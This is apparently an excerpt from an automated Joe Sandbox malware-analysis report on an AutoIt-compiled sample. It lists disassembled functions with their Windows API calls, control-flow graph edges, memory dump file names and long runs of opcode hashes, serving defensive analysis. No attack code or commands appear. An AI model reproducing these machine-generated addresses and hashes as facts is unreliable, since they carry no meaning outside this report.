                                                                                              • LoadIconW.USER32(000000A4), ref: 00D6349C
                                                                                              • LoadIconW.USER32(000000A2), ref: 00D634AE
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D634C6
                                                                                              • RegisterClassExW.USER32(?), ref: 00D63517
                                                                                                • Part of subcall function 00D635AB: GetSysColorBrush.USER32(0000000F), ref: 00D635DE
                                                                                                • Part of subcall function 00D635AB: RegisterClassExW.USER32(00000030), ref: 00D63608
                                                                                                • Part of subcall function 00D635AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D63619
                                                                                                • Part of subcall function 00D635AB: InitCommonControlsEx.COMCTL32(?), ref: 00D63636
                                                                                                • Part of subcall function 00D635AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D63646
                                                                                                • Part of subcall function 00D635AB: LoadIconW.USER32(000000A9), ref: 00D6365C
                                                                                                • Part of subcall function 00D635AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D6366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 69f55bdb9708e321f28290beef460391680ae8d43c6e1b74a6db9f6d75e3dc30
                                                                                              • Instruction ID: 7c686b7efb1cf2ee1ffdeef9a2621f757ff66d1f401802cb2c663e67c345b43b
                                                                                              • Opcode Fuzzy Hash: 69f55bdb9708e321f28290beef460391680ae8d43c6e1b74a6db9f6d75e3dc30
                                                                                              • Instruction Fuzzy Hash: 83213A71D0031DAFDB109FA6EC49AA9BFB6FB48B50F10401EE645B63A0C3B94549CFA0
                                                                                              Function 00D6CA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D6CE8E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: p3$p3$p3$p3$p5$p5$x3$x3
                                                                                              • API String ID: 1385522511-2512158659
                                                                                              • Opcode ID: 4351fded9667973c0a3c23773dee132ce4f37b4c0bf3a5854082bd027d96eb27
                                                                                              • Instruction ID: 14f718694c8d2ddb83bb0ed57622a9c7058b69f281ca9baf33f3bb718a9bb511
                                                                                              • Opcode Fuzzy Hash: 4351fded9667973c0a3c23773dee132ce4f37b4c0bf3a5854082bd027d96eb27
                                                                                              • Instruction Fuzzy Hash: EF32D279A00209DFCB24CF68C895EBE7BB5EF44300F698059E896AB251D774ED45CBB0
                                                                                              Function 00D63AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1082 d63aa3-d63ac6 1083 da4139-da414c call dca12a 1082->1083 1084 d63acc-d63b35 call d8019b call d67953 call d6bf07 call d67953 * 2 call d66e52 1082->1084 1091 da4153-da415b 1083->1091 1118 da456b-da457b call dca12a 1084->1118 1119 d63b3b-d63b48 call d66cce call d66b12 1084->1119 1093 da416b-da4173 1091->1093 1094 da415d-da4165 1091->1094 1096 da417e-da4186 1093->1096 1097 da4175-da417c 1093->1097 1094->1093 1095 d63b64-d63bd3 call d6bf07 call d63a70 call d6bf07 call d6557e call d641c9 call d66bfa 1094->1095 1132 da41b4-da41bf 1095->1132 1133 d63bd9-d63c48 call d6bf07 * 2 call d6694e call d67af4 SetCurrentDirectoryW call d6bd2c * 2 call d8019b call d641a6 1095->1133 1101 da4188-da418f 1096->1101 1102 da4191-da4199 1096->1102 1100 da41a6-da41af call dcd4bf 1097->1100 1100->1095 1101->1100 1102->1095 1106 da419f-da41a1 1102->1106 1106->1100 1125 da4580 1118->1125 1129 d63b4d-d63b5e call d66afb 1119->1129 1125->1125 1129->1091 1129->1095 1132->1133 1135 da41c5-da41f8 call d67953 call d6636d 1132->1135 1180 d63c4c-d63c51 1133->1180 1146 da41fe-da4225 call dd35cd call d663db 1135->1146 1147 da4502-da4519 call dca12a 1135->1147 1146->1147 1160 da422b-da42a7 call d8016b call d6bc23 call d6bb3d 1146->1160 1154 d63da5-d63df0 call d6bd2c * 2 call d67953 call d6bd2c call d67953 call d801a4 1147->1154 1182 da446f-da44ab call d6bc23 call dd13a0 call dc4a0c call d84d0e 1160->1182 1183 da42ad-da42cf call d6bc23 1160->1183 1184 d63c57-d63c64 call d6ad74 1180->1184 1185 d63d71-d63d92 call d67953 SetCurrentDirectoryW 1180->1185 1235 da44ad-da44d2 call d65c10 call d801a4 call dd1388 1182->1235 1200 da42d1-da42e0 1183->1200 1201 da42e5-da42f0 call dd14a6 1183->1201 1184->1185 1196 d63c6a-d63c86 call d64093 call d63ff3 1184->1196 1185->1154 1197 d63d94-d63da2 call d8015d call d801a4 1185->1197 1224 da454e-da4566 call dca12a 1196->1224 1225 d63c8c-d63ca3 call d63fb8 call d84cf3 1196->1225 1197->1154 1206 da4401-da4414 call d6bb3d 1200->1206 1212 da430d-da4318 call dd1492 1201->1212 1213 da42f2-da4308 1201->1213 1206->1183 1222 da441a-da4424 1206->1222 1231 da431a-da4329 1212->1231 1232 da432e-da4339 call d7e607 1212->1232 1213->1206 1227 da4426-da4434 1222->1227 1228 da4457 call dca486 1222->1228 1224->1185 1251 d63cc6-d63cc9 1225->1251 1252 d63ca5-d63cc0 call d86755 1225->1252 1227->1228 1229 da4436-da4455 call d640e0 1227->1229 1238 da445c-da4469 1228->1238 1229->1238 1231->1206 1232->1206 1247 da433f-da435b call dc9f0d 1232->1247 1235->1154 1238->1182 1238->1183 1262 da438a-da438d 1247->1262 1263 da435d-da4388 call d6b25f call d6bd2c 1247->1263 1253 d63df3-d63df9 1251->1253 1254 d63ccf-d63cd4 1251->1254 1252->1251 1252->1253 1253->1254 1261 d63dff-da452a 1253->1261 1258 da452f-da4537 call dc9dd5 1254->1258 1259 d63cda-d63d13 call d6b25f call d63e15 1254->1259 1283 da453c-da453f 1258->1283 1292 d63d15-d63d2c call d801a4 call d8015d 1259->1292 1293 d63d30-d63d32 1259->1293 1261->1254 1267 da43c9-da43cc 1262->1267 1268 da438f-da43b5 call d6b25f call d67d27 call d6bd2c 1262->1268 1305 da43b6-da43c7 call d6bc23 1263->1305 1271 da43ce-da43d7 call dc9e3c 1267->1271 1272 da43ed-da43f1 call dd142e 1267->1272 1268->1305 1288 da43dd-da43e8 call d801a4 1271->1288 1289 da44d7-da4500 call dca12a call d801a4 call d84d0e 1271->1289 1285 da43f6-da4400 call d801a4 1272->1285 1290 d63e08-d63e10 1283->1290 1291 da4545-da4549 1283->1291 1285->1206 1288->1183 1289->1235 1300 d63d5e-d63d6b 1290->1300 1291->1290 1292->1293 1303 d63e04 1293->1303 1304 d63d38-d63d3b 1293->1304 1300->1180 1300->1185 1303->1290 1304->1290 1310 d63d41-d63d44 1304->1310 1305->1285 1310->1283 1314 d63d4a-d63d59 call d640e0 1310->1314 1314->1300
                                                                                              APIs
                                                                                                • Part of subcall function 00D67953: CloseHandle.KERNELBASE(?,?,00000000,00DA3A1C), ref: 00D67973
                                                                                                • Part of subcall function 00D66E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00D66E80
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00D63C17
                                                                                              • _wcslen.LIBCMT ref: 00D63C96
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D63D81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 3350465876-3738523708
                                                                                              • Opcode ID: 03d1a22e5458bab5ea7e0d624ccfea3365ff2e00e27933c6e673bd3e54c2bde1
                                                                                              • Instruction ID: aecc04d5d9308fcbb90367431d23cca583c4cb6f6a93d3c55f31def2f93f8470
                                                                                              • Opcode Fuzzy Hash: 03d1a22e5458bab5ea7e0d624ccfea3365ff2e00e27933c6e673bd3e54c2bde1
                                                                                              • Instruction Fuzzy Hash: 93228B315083419FC714EF24C891AAEBBE5EFD9314F04491EF585972A2DBB1DA48CB72
                                                                                              Function 00D6F680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D5$D5$D5$D5$D5$Variable must be of type 'Object'.
                                                                                              • API String ID: 0-3824067622
                                                                                              • Opcode ID: cd0eaf4cea74518f2d5e17a10b4212596d5b8232067fe702758b93c2661c13de
                                                                                              • Instruction ID: d62eed0031e96329015fc6e9453099e7abb53dd3f42097ab5c080fc1e00c8703
                                                                                              • Opcode Fuzzy Hash: cd0eaf4cea74518f2d5e17a10b4212596d5b8232067fe702758b93c2661c13de
                                                                                              • Instruction Fuzzy Hash: 41C27A75A00604DFCB24CF98D881AADBBB1FF09310F288169E955AB392D775ED45CBB0
                                                                                              Function 00D702F0 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D715A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: D5$D5$D5$D5$D5
                                                                                              • API String ID: 1385522511-586526777
                                                                                              • Opcode ID: 908769b5b7582a5d8bc04c34d9ffeb4023b7a6ebc831d1f7480b7034d2d6a5e9
                                                                                              • Instruction ID: 2e377e5883f5b6714811f5894e000b382c337206cc590a7d8eb176dffa62e139
                                                                                              • Opcode Fuzzy Hash: 908769b5b7582a5d8bc04c34d9ffeb4023b7a6ebc831d1f7480b7034d2d6a5e9
                                                                                              • Instruction Fuzzy Hash: C0B28E74608340CFD724DF18C480A2ABBE1FF89714F18895DE99A9B391E771ED45CBA2
                                                                                              Function 00D62A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2288 d62a52-d62a8b 2289 d62a91-d62aa7 mciSendStringW 2288->2289 2290 da39f4-da39f5 DestroyWindow 2288->2290 2291 d62aad-d62ab5 2289->2291 2292 d62d08-d62d15 2289->2292 2293 da3a00-da3a0d 2290->2293 2291->2293 2294 d62abb-d62aca call d62e70 2291->2294 2295 d62d17-d62d32 UnregisterHotKey 2292->2295 2296 d62d3a-d62d41 2292->2296 2297 da3a0f-da3a12 2293->2297 2298 da3a3c-da3a43 2293->2298 2309 da3a4a-da3a56 2294->2309 2310 d62ad0-d62ad8 2294->2310 2295->2296 2300 d62d34-d62d35 call d62712 2295->2300 2296->2291 2301 d62d47 2296->2301 2302 da3a1e-da3a21 FindClose 2297->2302 2303 da3a14-da3a1c call d67953 2297->2303 2298->2293 2306 da3a45 2298->2306 2300->2296 2301->2292 2308 da3a27-da3a34 2302->2308 2303->2308 2306->2309 2308->2298 2312 da3a36-da3a37 call dd3c0b 2308->2312 2315 da3a58-da3a5a FreeLibrary 2309->2315 2316 da3a60-da3a67 2309->2316 2313 da3a6e-da3a7b 2310->2313 2314 d62ade-d62b03 call d6e650 2310->2314 2312->2298 2318 da3a7d-da3a9a VirtualFree 2313->2318 2319 da3aa2-da3aa9 2313->2319 2326 d62b05 2314->2326 2327 d62b3a-d62b45 CoUninitialize 2314->2327 2315->2316 2316->2309 2317 da3a69 2316->2317 2317->2313 2318->2319 2322 da3a9c-da3a9d call dd3c71 2318->2322 2319->2313 2323 da3aab 2319->2323 2322->2319 2328 da3ab0-da3ab4 2323->2328 2330 d62b08-d62b38 call d63047 call d62ff0 2326->2330 2327->2328 2329 d62b4b-d62b50 2327->2329 2328->2329 2333 da3aba-da3ac0 2328->2333 2331 d62b56-d62b60 2329->2331 2332 da3ac5-da3ad2 call dd3c45 2329->2332 2330->2327 2335 d62b66-d62b71 call d6bd2c 2331->2335 2336 d62d49-d62d56 call d7fb27 2331->2336 2344 da3ad4 2332->2344 2333->2329 2348 d62b77 call d62f86 2335->2348 2336->2335 2349 d62d5c 2336->2349 2350 da3ad9-da3afb call d8015d 2344->2350 2351 d62b7c-d62be7 call d62e17 call d801a4 call d62dbe call d6bd2c call d6e650 call d62e40 call d801a4 2348->2351 2349->2336 2356 da3afd 2350->2356 2351->2350 2378 d62bed-d62c11 call d801a4 2351->2378 2359 da3b02-da3b24 call d8015d 2356->2359 2366 da3b26 2359->2366 2369 da3b2b-da3b4d call d8015d 2366->2369 2374 da3b4f 2369->2374 2377 da3b54-da3b61 call dc6d63 2374->2377 2383 da3b63 2377->2383 2378->2359 2384 d62c17-d62c3b call d801a4 2378->2384 2386 da3b68-da3b75 call d7bd6a 2383->2386 2384->2369 2389 d62c41-d62c5b call d801a4 2384->2389 2393 da3b77 2386->2393 2389->2377 2394 d62c61-d62c85 call d62e17 call d801a4 2389->2394 2396 da3b7c-da3b89 call dd3b9f 2393->2396 2394->2386 2403 d62c8b-d62c93 2394->2403 2402 da3b8b 2396->2402 2404 da3b90-da3b9d call dd3c26 2402->2404 2403->2396 2405 d62c99-d62caa call d6bd2c call d62f4c 2403->2405 2410 da3b9f 2404->2410 2412 d62caf-d62cb7 2405->2412 2413 da3ba4-da3bb1 call dd3c26 2410->2413 2412->2404 2414 d62cbd-d62ccb 2412->2414 2419 da3bb3 2413->2419 2414->2413 2416 d62cd1-d62d07 call d6bd2c * 3 call d62eb8 2414->2416 2419->2419
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D62A9B
                                                                                              • CoUninitialize.COMBASE ref: 00D62B3A
                                                                                              • UnregisterHotKey.USER32(?), ref: 00D62D1F
                                                                                              • DestroyWindow.USER32(?), ref: 00DA39F5
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00DA3A5A
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DA3A87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 3849d99b6b3aa9792e01f3c3ae01b06579835a6c88d1e8049533baf87a611676
                                                                                              • Instruction ID: ddc5fee561793217caa5efe2ebddb2805653b123c1b2cd218df20ed4c5a69ffc
                                                                                              • Opcode Fuzzy Hash: 3849d99b6b3aa9792e01f3c3ae01b06579835a6c88d1e8049533baf87a611676
                                                                                              • Instruction Fuzzy Hash: 1DD15A317016128FCB19EF54C489A69F7A2FF05710F1581ADE98AAB251CB70ED16CFB1
                                                                                              Function 00DD874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2427 dd874a-dd878c call da22f0 call d68e70 2432 dd878e-dd879c call d6c92d 2427->2432 2433 dd87a2 2427->2433 2432->2433 2439 dd879e-dd87a0 2432->2439 2435 dd87a4-dd87b0 2433->2435 2437 dd886d-dd891f call d68e70 call d6557e call d8d913 call d893c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2435->2437 2438 dd87b6 2435->2438 2472 dd8921-dd892d call dce387 2437->2472 2473 dd8973-dd8984 call d6e650 2437->2473 2441 dd87ba-dd87c0 2438->2441 2439->2435 2443 dd87ca-dd87cf 2441->2443 2444 dd87c2-dd87c8 2441->2444 2447 dd87d9-dd87df 2443->2447 2448 dd87d1-dd87d4 2443->2448 2446 dd87d6 2444->2446 2446->2447 2449 dd8848-dd884a 2447->2449 2450 dd87e1-dd87e4 2447->2450 2448->2446 2454 dd884b-dd884e 2449->2454 2450->2449 2453 dd87e6-dd87e9 2450->2453 2456 dd87eb-dd87ee 2453->2456 2457 dd8844-dd8846 2453->2457 2458 dd8858 2454->2458 2459 dd8850-dd8856 2454->2459 2456->2457 2461 dd87f0-dd87f3 2456->2461 2462 dd883d-dd883e 2457->2462 2463 dd885c-dd8867 2458->2463 2459->2463 2465 dd87f5-dd87f8 2461->2465 2466 dd8840-dd8842 2461->2466 2462->2454 2463->2437 2463->2441 2465->2466 2468 dd87fa-dd87fd 2465->2468 2466->2462 2470 dd87ff-dd8802 2468->2470 2471 dd883b 2468->2471 2470->2471 2474 dd8804-dd8807 2470->2474 2471->2462 2472->2473 2483 dd892f-dd893a call dce9c5 2472->2483 2482 dd8987-dd898b call d6bd2c 2473->2482 2476 dd8809-dd880c 2474->2476 2477 dd8834-dd8839 2474->2477 2476->2477 2481 dd880e-dd8811 2476->2481 2477->2454 2484 dd882d-dd8832 2481->2484 2485 dd8813-dd8816 2481->2485 2489 dd8990-dd8998 2482->2489 2493 dd89cf 2483->2493 2494 dd8940-dd8967 GetFileAttributesW SetFileAttributesW 2483->2494 2484->2454 2485->2484 2488 dd8818-dd881b 2485->2488 2491 dd881d-dd8820 2488->2491 2492 dd8826-dd882b 2488->2492 2491->2492 2495 dd899b-dd89af call d6e650 2491->2495 2492->2454 2497 dd89d3-dd89e5 call dd9f9f 2493->2497 2498 dd8969-dd8971 SetCurrentDirectoryW 2494->2498 2499 dd89b1-dd89b3 2494->2499 2495->2489 2505 dd89ea-dd89ec 2497->2505 2498->2473 2501 dd89b5-dd89cd SetCurrentDirectoryW call d84d13 2499->2501 2502 dd8a02-dd8a0c SetCurrentDirectoryW 2499->2502 2501->2497 2502->2482 2505->2502 2507 dd89ee-dd89fb call d6e650 2505->2507 2507->2502
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD8907
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00DD891B
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00DD8945
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00DD895F
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8971
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD89BA
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00DD8A0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                              • String ID: *.*
                                                                                              • API String ID: 769691225-438819550
                                                                                              • Opcode ID: 1cf403313e88e2eb472fea212489496aef50eba2e483e082149f4679e8a9a8ef
                                                                                              • Instruction ID: c0e32098fa1a27885c8d7c0788d3bfd9f2acb96b3ce1fce66d9cfc81543bb981
                                                                                              • Opcode Fuzzy Hash: 1cf403313e88e2eb472fea212489496aef50eba2e483e082149f4679e8a9a8ef
                                                                                              • Instruction Fuzzy Hash: 1F818C725043419BCB21EF58C494AAAB3E9FB88310F58481BF4C5D7351DB35E945EBB2
                                                                                              Function 00D990D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2592 d990d5-d990e5 2593 d990ff-d99101 2592->2593 2594 d990e7-d990fa call d8f656 call d8f669 2592->2594 2595 d99469-d99476 call d8f656 call d8f669 2593->2595 2596 d99107-d9910d 2593->2596 2608 d99481 2594->2608 2613 d9947c call d92b7c 2595->2613 2596->2595 2598 d99113-d9913e 2596->2598 2598->2595 2602 d99144-d9914d 2598->2602 2606 d9914f-d99162 call d8f656 call d8f669 2602->2606 2607 d99167-d99169 2602->2607 2606->2613 2611 d9916f-d99173 2607->2611 2612 d99465-d99467 2607->2612 2614 d99484-d99489 2608->2614 2611->2612 2616 d99179-d9917d 2611->2616 2612->2614 2613->2608 2616->2606 2619 d9917f-d99196 2616->2619 2621 d99198-d9919b 2619->2621 2622 d991b3-d991bc 2619->2622 2625 d9919d-d991a3 2621->2625 2626 d991a5-d991ae 2621->2626 2623 d991da-d991e4 2622->2623 2624 d991be-d991d5 call d8f656 call d8f669 call d92b7c 2622->2624 2629 d991eb-d991ec call d93bb0 2623->2629 2630 d991e6-d991e8 2623->2630 2657 d9939c 2624->2657 2625->2624 2625->2626 2627 d9924f-d99269 2626->2627 2632 d9933d-d99346 call d9fc3b 2627->2632 2633 d9926f-d9927f 2627->2633 2638 d991f1-d99209 call d92d58 * 2 2629->2638 2630->2629 2644 d993b9 2632->2644 2645 d99348-d9935a 2632->2645 2633->2632 2637 d99285-d99287 2633->2637 2637->2632 2641 d9928d-d992b3 2637->2641 2661 d9920b-d99221 call d8f669 call d8f656 2638->2661 2662 d99226-d9924c call d997b4 2638->2662 2641->2632 2646 d992b9-d992cc 2641->2646 2649 d993bd-d993d5 ReadFile 2644->2649 2645->2644 2651 d9935c-d9936b GetConsoleMode 2645->2651 2646->2632 2652 d992ce-d992d0 2646->2652 2655 d99431-d9943c GetLastError 2649->2655 2656 d993d7-d993dd 2649->2656 2651->2644 2658 d9936d-d99371 2651->2658 2652->2632 2653 d992d2-d992fd 2652->2653 2653->2632 2660 d992ff-d99312 2653->2660 2663 d9943e-d99450 call d8f669 call d8f656 2655->2663 2664 d99455-d99458 2655->2664 2656->2655 2665 d993df 2656->2665 2659 d9939f-d993a9 call d92d58 2657->2659 2658->2649 2666 d99373-d9938d ReadConsoleW 2658->2666 2659->2614 2660->2632 2668 d99314-d99316 2660->2668 2661->2657 2662->2627 2663->2657 2675 d9945e-d99460 2664->2675 2676 d99395-d9939b call d8f633 2664->2676 2672 d993e2-d993f4 2665->2672 2673 d9938f GetLastError 2666->2673 2674 d993ae-d993b7 2666->2674 2668->2632 2678 d99318-d99338 2668->2678 2672->2659 2682 d993f6-d993fa 2672->2682 2673->2676 2674->2672 2675->2659 2676->2657 2678->2632 2686 d993fc-d9940c call d98df1 2682->2686 2687 d99413-d9941e 2682->2687 2699 d9940f-d99411 2686->2699 2692 d9942a-d9942f call d98c31 2687->2692 2693 d99420 call d98f41 2687->2693 2697 d99425-d99428 2692->2697 2693->2697 2697->2699 2699->2659
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bccb2f148c05c21d3f179fae3446f65cce46f4ac1df4277f6b3822bb50690bf2
